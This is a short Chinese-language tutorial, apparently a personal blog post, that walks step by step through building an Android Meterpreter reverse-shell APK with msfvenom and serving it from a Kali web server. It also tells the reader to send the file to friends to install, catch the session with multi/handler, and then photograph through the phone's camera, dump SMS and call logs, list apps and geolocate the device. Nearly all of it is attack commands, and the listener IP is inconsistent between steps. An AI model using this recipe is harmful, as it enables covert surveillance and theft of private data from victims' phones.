只是感觉挺有趣的就学了一下并分享出来,仅供学习使用
1.生成apk(目标手机安装)
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=8888 R > tst.apk
注意:ip地址是kali的,不是目标手机的
2.开启kali自带的web服务器
sudo service apache2 start
3.将apk拷贝到服务器根目录
sudo cp tst.apk /var/www/html
4.目标手机下载安装txt.apk
方法一:目标手机直接在网址栏输入kali ip,会自动下载安装apk
方法二:直接ls找到apk文件,复制后发送给好友,好友点击下载安装
5.设置监听会话,启动msfconsole渗透利用框架程序
msfconsole
6.使用一个模块在kali设置一个监听的程序
use multi/handler
7.设置载荷
set payload android/meterpreter/reverse_tcp
8.看一下该载荷需要设置什么参数
show options
9.设置参数
set LHOST 192.168.1.127
set LPORT 8888
10.执行监听端程序
run
11.目标手机运行这个程序后
获取目标手机信息:
1.获取手机系统信息
sysinfo
2.获取手机安装的哪些软件
app_list
3.目标手机拍照并回显
webcam_snap
4.目标手机信息
dump_sms
5.获得目标手机通讯录
dump_calllog
6.GPS定位目标手机
geolocate
